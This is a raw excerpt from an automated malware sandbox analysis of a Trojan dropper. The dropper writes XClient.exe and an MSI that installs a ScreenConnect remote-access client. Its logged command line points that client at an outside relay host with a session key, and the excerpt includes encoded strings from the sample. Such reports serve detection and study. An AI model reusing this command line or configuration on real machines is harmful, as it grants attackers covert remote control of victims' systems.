                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, aOY1LHkSxcz7bCNxQCW.csBase64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'
                        Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: XClient.exe.0.dr, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: ScreenConnect.ClientService.dll.4.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@34/66@2/2
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeMutant created: \Sessions\1\BaseNamedObjects\9kW2CKASZhbPokU8k
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\BufgvcOijCZ3VRLV
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6468
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmpJump to behavior
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeReversingLabs: Detection: 63%
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeVirustotal: Detection: 59%
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi"
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB C
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c="
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi" Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB CJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User"Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660
                        Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
